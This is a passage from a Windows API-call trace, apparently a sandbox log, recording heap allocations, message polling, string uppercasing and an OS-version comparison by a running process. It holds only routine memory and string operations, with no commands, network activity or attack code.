(HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.088] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.089] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.089] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.090] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.090] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0256.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ba8 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9db0 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.091] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.091] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.092] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.092] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.093] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0256.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.093] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0256.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0256.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.094] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.096] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.096] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0256.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.097] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0256.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0256.098] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.098] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0256.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.099] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.099] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0256.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0256.100] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0256.100] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 